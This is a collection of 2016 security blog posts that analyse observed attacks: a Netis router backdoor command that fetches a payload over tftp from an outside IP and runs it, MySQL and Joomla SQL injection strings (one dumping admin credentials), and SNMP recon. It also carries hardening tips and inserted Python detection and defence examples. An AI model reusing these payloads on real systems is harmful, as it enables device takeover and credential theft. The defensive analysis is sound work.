Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries is to move into a directory where he likely has read/write permissions. He uses the double pipe (||) so that if the first command fails, the second command is executed, and if that one fails, the third is executed. It's essentially: if this command works, use it, otherwise try the next, otherwise try the next. So he checks whether he has permission to move into the /tmp folder, the /var folder, or the /dev folder. If he gets into any of those folders then he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the attacker is taking advantage of busybox, a tool found on many embedded Linux devices (likely including the exploitable Netis router) that bundles many basic Linux commands/functions, such as tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

   -r FILE Remote FILE
   -g Get file


So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49, and save it to the current directory (again this could be /tmp, /var, or /dev depending on which of the first commands succeeded).

Then

cp /bin/sh .;

Next the attacker makes a copy of the shell executable in the current directory (again this could be /tmp, /var, or /dev depending on which of the first commands succeeded).

Then

cat min >sh;

Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.

Then

chmod 777 sh;

Then the permissions on sh are changed so that the attacker is able to execute it.

Then

./sh.

Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.

As for prevention, I'm not sure that I've seen anything about Netis actually patching it, so you probably need some sort of IPS (Intrusion Prevention System) with a signature that can block this type of traffic.
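As an added example (not from the post or the ISC diary), here is a small Python classifier that runs over a UDP datagram's payload and reports which stages of the command chain above it contains, the way an IPS signature would; the sample datagrams and the 192.0.2.10 download host are constructed placeholders.

```python
import re

NETIS_BACKDOOR_PORT = 53413   # UDP port the backdoor listens on, per the post

# One regex per stage of the command chain the post walks through. Constructed from the
# post's own command for illustration; not a vendor or IDS signature.
STAGE_PATTERNS = {
    "cd_writable_dir": re.compile(r"\bcd\s+/(tmp|var|dev)/?\b"),
    "busybox_tftp_get": re.compile(r"\bbusybox\s+tftp\b[^;|&]*\s-g\b"),
    "copy_bin_sh": re.compile(r"\bcp\s+/bin/sh\s"),
    "redirect_into_sh": re.compile(r"\bcat\s+\S+\s*>\s*\S+"),
    "chmod_777": re.compile(r"\bchmod\s+777\b"),
    "exec_local_file": re.compile(r"\./\S+"),
}

def extract_ips(text):
    """IPv4 literals in the payload: the hosts the payload is fetched from (block/hunt for these)."""
    return re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text)

def classify_udp_datagram(dst_port, payload):
    """Report which stages one datagram contains and whether it matches the backdoor pattern."""
    text = payload.decode("latin-1")      # 1:1 byte mapping, so attacker bytes never raise
    matched = [name for name, rx in STAGE_PATTERNS.items() if rx.search(text)]
    # Alert on the download-and-execute core, or on three or more stages together;
    # the port alone is only context, since any UDP traffic can hit 53413.
    core = {"busybox_tftp_get", "exec_local_file"} <= set(matched)
    return {
        "dst_port": dst_port,
        "port_match": dst_port == NETIS_BACKDOOR_PORT,
        "stages": matched,
        "download_hosts": extract_ips(text),
        "alert": core or len(matched) >= 3,
    }

# Constructed sample datagrams; 192.0.2.10 is an RFC 5737 documentation address, not the post's host.
SAMPLE_ATTACK = (b"cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 192.0.2.10;"
                 b"cp /bin/sh .;cat min >sh;chmod 777 sh;./sh")
SAMPLE_BENIGN = b"\x00\x01\x02 hello"
```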

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Thursday, August 4, 2016

Simple MySQL SQL Injection Example

I saw this SQL injection attempt and thought it was worth mentioning.

SourceIp: 5.101.156.112
GET /?Cookie=language99999' union select unhex(hex(version())) -- 'x'='x HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)


The attacker must believe the Cookie query string parameter is vulnerable to SQL injection. So they put in a value (language99999) but then try to break out of the SQL string literal with an apostrophe.

Thus for example if the web developer was performing a database query such as

select result from language table where id='@Cookie'

The attempt here is to break out of that parameter and union (join) the search results with another evil query, such as:

select result from language table where id='language99999' union select unhex(hex(version())) -- 'x'='x'

The attacker is using 3 MySQL functions in this attack
1.) version() which returns the MYSQL version number.
2.) hex() which converts a string to a hex value.
3.) unhex() which converts a hex value back to a string.


In theory if this works the MYSQL database version will get returned instead of the language result.


As a sysadmin to prevent this ensure your website is up to date and patched, and implement an IPS or WAF that could block these basic attacks even if you are vulnerable.

As a web developer, to prevent this ensure you're using strongly typed parameterized SQL queries; in addition, do pattern matching to ensure that parameters like language are in the format you expect, and use SQL injection sanitization libraries so that evil characters like apostrophes are encoded and rendered harmless.


Wednesday, August 3, 2016

What is www.dsply.com ?

I recently ran across a suspicious looking domain name in some SSL certificate traffic, www.dsply.com, and wondered if others had the same question. What is it? Below I do a little quick research to find out.



First I used a proxy method (urlquery or a lab, etc.) to navigate to the url and sure enough there is even a nice explanation explaining that it's a domain name used for cookie/customer tracking of users of the Answers.com website.



Being in security, I naturally don't trust what I see ... so I wanted to confirm this (because any Joe Blow could've put up this splash page claiming to be affiliated with Answers.com). So I navigated to Answers.com in chrome and ran developer tools.



In developer tools under Network I looked, and sure enough there is a script call to www.dsply.com, so unless somebody has hacked Answers.com or my browser, it's safe for me to assume that www.dsply.com is a legit domain used by Answers.com to track its users. Some sorta master tracking cookie.



Now whether you choose to block this cookie or not is more of a privacy issue, but I don't believe it's a security risk/hacked domain or anything like that. Thus you can move on and look at something else now :-)


Tuesday, August 2, 2016

Article on Securing a Linux Server

Thought this was a fun little blog by Cody Littlewood about Securing a Linux Server. He runs through the things he does in the first 10 minutes and I thought they were worth listing out. Quite a bit of good discussion in the comments after it as well.

1.) Setup a strong root password
2.) Update your apt repositories
3.) Upgrade your patches via apt
4.) Add your user (so you don't ever use root again)
5.) Setup SSH key authentication (so eventually below we can eliminate passwords)
6.) Setup sudo for your user
7.) Enforce SSH key authentication (don't allow root login, eliminate password auth, ip filter)
8.) Setup your local firewall (don't forget your ip filter you added for ssh)
9.) Enable automatic security updates
10.) Enable fail2ban to block suspicious activity real-time
11.) Enable 2-factor authentication (like google authenticator)
12.) Enable a tool like LogWatch to ensure you are monitoring your logs


It's a good start to your Server Build/Hardening guide you should have.
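As an added example (not from the post or Cody Littlewood's article), here is a Python check for step 7 of the list that audits an sshd_config the way sshd reads it, where the first value for a keyword wins; it assumes no Match blocks or Include files, and the sample configs are constructed.

```python
# sshd uses the FIRST value it sees for a keyword, so the checker mirrors that rule.
# Simplification (assumption): Match blocks and Include files are not handled.
REQUIRED = {   # keyword -> (required value, effective default when the keyword is absent)
    "permitrootlogin": ("no", "unset"),
    "passwordauthentication": ("no", "yes"),
    "pubkeyauthentication": ("yes", "yes"),
}

def effective_settings(config_text):
    """Return {keyword: value} with sshd's first-match semantics; comments and blanks are ignored."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)   # 'Key value' or 'Key=value'
        if len(parts) == 2:
            seen.setdefault(parts[0].lower(), parts[1].strip())
    return seen

def audit_sshd_config(config_text):
    """Return findings for step 7 of the list; an empty list means key-only auth is enforced."""
    settings = effective_settings(config_text)
    findings = []
    for key, (want, default) in REQUIRED.items():
        got = settings.get(key, default)
        if got.lower() != want:
            findings.append("%s should be %s (effective value: %s)" % (key, want, got))
    return findings

# Constructed sample configs. WEAK shows the two classic mistakes: the hardening line is
# still commented out, and a later 'no' loses to an earlier 'yes'.
WEAK = "#PermitRootLogin no\nPasswordAuthentication yes\nPasswordAuthentication no\n"
HARDENED = "PermitRootLogin no\nPasswordAuthentication no\nPubkeyAuthentication yes\n"
```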


SSL in the News

Just a couple positive movements around SSL / HTTPS in the news over the past few months.

8/1/2016 - Google enables HSTS
By using HSTS, visitors following HTTP links to Google.com will be automatically redirected to the more secure HTTPS version of the Google domain. The effort, announced Friday, is meant to protect against protocol downgrade attacks, session hijacking and man-in-the-middle attacks that exploit insecure web connections.

6/8/2016 - Google Gmail deprecating SSLv3 and RC4
Google said that it will initiate on June 16 a gradual deprecation of SSLv3 and RC4 for Gmail IMAP/POP mail clients. Both the protocol and the cipher are notoriously unsafe and are being phased out in big chunks of the Internet. Google, for its part, had already announced in May that it would no longer support SSLv3 and RC4 connections for Gmail SMTP.




Joomla SQL Injection Walk-Through

I saw this pastebin post with a joomla sql injection exploit perl script that I thought was interesting enough to write a bit about.

Upon reviewing the code I see that the exploit constructs a url such as

http://victim.com/index.php?option=com_jumi&fileid=93&Itemid=117+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+

This appears to exploit a Joomla com_jumi parameter called 'Itemid' that must not properly sanitize user input and thus allows for sql commands to be injected and executed against the database.

It's likely that behind the scenes the Joomla developers are performing a query on the database such as

   select |24 fields| from |itemtable| where Itemid = HttpRequest["ItemId"]

But since they aren't sanitizing the ItemId parameter, an attacker can enter a value such as the one below. (Notice the + signs above are simply a way to encode spaces in a URL, so I've removed them. Also, /**/ is just an empty comment that does nothing except obfuscate, so it can safely be removed for analysis. And 0x3a is the hex equivalent of the single colon character (:), so I've replaced it as well for simplicity.)

   ItemId=117 UNION SELECT 1,concat(username,':',password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from jos_users --

So you see above that we first pass in an actual item id (117) so that the query returns at least a single record. Next there is a "union select", which means we're going to union (concatenate/join) the results of the SQL query defined by the developer with a SQL query we define ourselves. In order to union or combine 2 SQL queries the number of columns must match, which is why you see 24 columns (23 of them are integer values that the system would automatically cast/convert into strings if needed). The attacker must know that column #2 is the one the website displays in the HTML response, so they choose to display their exfiltrated data in column #2. What they display is the username and password concatenated together from the jos_users table. It is likely that the 1st record in this table is the Joomla administrator, thus if this attack is successful the administrative username and password will be displayed in the browser.

To prevent this as a Sys Admin of a Joomla site, upgrade and patch as soon as patches are available. If you see active exploits, implement an IPS (intrusion prevention system) that allows you to block malicious looking requests like this.

To prevent this as a web developer, use strongly typed parameterized SQL queries so that an integer (like ItemId) cannot be turned into a string. Also utilize a standard security library that sanitizes or encodes malicious looking characters like +, /, *, or -.
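As an added example covering both this post and the earlier "Simple MySQL SQL Injection Example" (not code from either post or from Joomla), here is the vulnerable string-built query beside the strongly typed, parameterized version, run against a constructed SQLite stand-in so it works offline: sqlite_version() replaces MySQL's version(), || replaces concat(), and the items table has 3 columns rather than 24.

```python
import re
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the tables the two posts reason about (3 columns, not 24)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table language (id text primary key, result text);
        insert into language values ('en', 'English'), ('de', 'German');
        create table items (itemid integer primary key, title text, c3 text);
        insert into items values (117, 'Front page', 'x');
        create table jos_users (username text, password text);
        insert into jos_users values ('admin', 'constructed-hash-placeholder');
    """)
    return conn

# Vulnerable: the request values are pasted into the SQL text, as the posts reconstruct.
def language_vulnerable(conn, cookie):
    return [r[0] for r in conn.execute("select result from language where id='%s'" % cookie)]

def items_vulnerable(conn, itemid):
    return list(conn.execute("select itemid, title, c3 from items where itemid = %s" % itemid))

# Hardened: validate the shape first, then bind the value so it can only ever be data.
LANG_RE = re.compile(r"[a-z]{2,8}")

def language_parameterized(conn, cookie):
    return [r[0] for r in conn.execute("select result from language where id = ?", (cookie,))]

def language_safe(conn, cookie):
    if not LANG_RE.fullmatch(cookie):
        raise ValueError("language id rejected: %r" % cookie)
    return language_parameterized(conn, cookie)

def items_safe(conn, itemid):
    itemid = int(itemid)     # strongly typed: '117 UNION SELECT ...' raises ValueError here
    return list(conn.execute("select itemid, title, c3 from items where itemid = ?", (itemid,)))

# The two inputs from the posts, adapted to SQLite: sqlite_version() stands in for MySQL's
# version(), and || for concat(); 0x3a and /**/ are already resolved as the Joomla post does.
COOKIE_ATTACK = "language99999' union select sqlite_version() -- 'x'='x"
ITEMID_ATTACK = "117 UNION SELECT 1, username || ':' || password, 3 from jos_users --"
```

Against the vulnerable functions both inputs return attacker-chosen rows; against the safe ones the cookie becomes a plain (non-matching) literal and the item id is rejected before any SQL runs.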


Monday, August 1, 2016

SNMP get-next-request Recon

I noticed some external recon via SNMP. There were 2 requests, both over port 161 from the internet. They were IP packets via UDP. The requests both seem to be "get-next-request", both from the same source and to the same destination.

An SNMP get-next request retrieves SNMP MIB (management information base) table values. The MIB values are referenced using a series of dotted integers. For example, a request for the MIB variable "1.3.6.1.2.1.1.1" would return the system description for the network device. So if it's a router it would return the vendor, version, etc., as in the requests shown below.

The only differences between the 2 requests are
1.) version
2.) request-id


SNMP version-1 (0) is the oldest version and sends everything in plaintext. SNMP v2c (1) is the same as version-1 except that it has a larger counter field for more flexible polling intervals of the systems being monitored. There is a version 3 that adds security, but the attacker is not looking for this version, thus I can only assume that whatever they're after is only applicable if they find v1 or v2.

The request-id is just a unique integer that identifies that specific message, so it makes sense that each request contains a different id.

Thus the conclusion is that the attacker is using these packet requests to determine whether this device responds to SNMP v1 or v2, perhaps with a tool like SNMPWalk, and then to determine what type of device it is. The attacker can then use this information to determine what patch level it's at and which exploits to use against it.

Simple Network Management Protocol
  version: version-1 (0)
  community: public
  data: get-next-request (1)
   get-next-request
    request-id: 1118066890
    error-status: noError (0)
    error-index: 0
    variable-bindings: 1 item
     1.3.6.1.2.1.1.1.0: Value (Null)
      Object Name: 1.3.6.1.2.1.1.1.0 (iso.3.6.1.2.1.1.1.0)
      Value (Null)


Simple Network Management Protocol
  version: v2c (1)
  community: public
  data: get-next-request (1)
   get-next-request
    request-id: 1118066889
    error-status: noError (0)
    error-index: 0
    variable-bindings: 1 item
     1.3.6.1.2.1.1.1.0: Value (Null)
      Object Name: 1.3.6.1.2.1.1.1.0 (iso.3.6.1.2.1.1.1.0)
      Value (Null)


SANS provides a nice link explaining snmp recon.
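An added example (not from the post or SANS): a minimal BER decoder in Python that recovers from raw SNMP v1/v2c bytes the fields the two dissections above show and flags the recon pattern described; the sample bytes are constructed to reproduce the first request above, and only short-form (under 128 byte) lengths are handled.

```python
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_NAMES = {0xA0: "get-request", 0xA1: "get-next-request", 0xA2: "get-response"}

def tlv_read(buf, pos=0):
    """Read one BER tag-length-value at pos (short-form length, i.e. packets < 128 bytes)."""
    tag, length = buf[pos], buf[pos + 1]
    return tag, buf[pos + 2:pos + 2 + length], pos + 2 + length

def dec_int(b):
    return int.from_bytes(b, "big", signed=True)

def dec_oid(b):
    """Decode a BER OID: first byte packs two arcs, the rest are base-128 with a continuation bit."""
    parts, val = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:
        val = (val << 7) | (byte & 0x7F)
        if not byte & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))

def parse_snmp(pkt):
    """Return the per-message fields a packet dissector shows for a v1/v2c request."""
    _, msg, _ = tlv_read(pkt)                    # outer SEQUENCE
    _, ver, pos = tlv_read(msg)                  # version: 0 = v1, 1 = v2c
    _, comm, pos = tlv_read(msg, pos)            # community string
    pdu_tag, pdu, _ = tlv_read(msg, pos)         # context tag A0/A1/A2 names the PDU type
    _, rid, p = tlv_read(pdu)                    # request-id
    _, err, p = tlv_read(pdu, p)                 # error-status
    _, _, p = tlv_read(pdu, p)                   # error-index
    _, vbl, _ = tlv_read(pdu, p)                 # variable-bindings SEQUENCE
    oids, q = [], 0
    while q < len(vbl):
        _, vb, q = tlv_read(vbl, q)              # each varbind is SEQUENCE { OID, value }
        oids.append(dec_oid(tlv_read(vb)[1]))
    return {"version": {0: "v1", 1: "v2c"}.get(dec_int(ver), dec_int(ver)), "community": comm.decode(),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "request_id": dec_int(rid),
            "error_status": dec_int(err), "oids": oids}

def is_recon_probe(info):
    """Flag what the post describes: v1/v2c, default 'public' community, get-next walking system(1)."""
    return (info["version"] in ("v1", "v2c") and info["community"] == "public"
            and info["pdu"] == "get-next-request" and any(o.startswith("1.3.6.1.2.1.1") for o in info["oids"]))

# Constructed sample bytes reproducing the first dissection in the post
# (v1, community "public", request-id 1118066890, OID 1.3.6.1.2.1.1.1.0, Null value).
SAMPLE_V1 = bytes.fromhex(
    "30 29 02 01 00 04 06 70 75 62 6c 69 63 a1 1c 02 04 42 a4 58 ca 02 01 00 02 01 00"
    " 30 0e 30 0c 06 08 2b 06 01 02 01 01 01 00 05 00")
```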
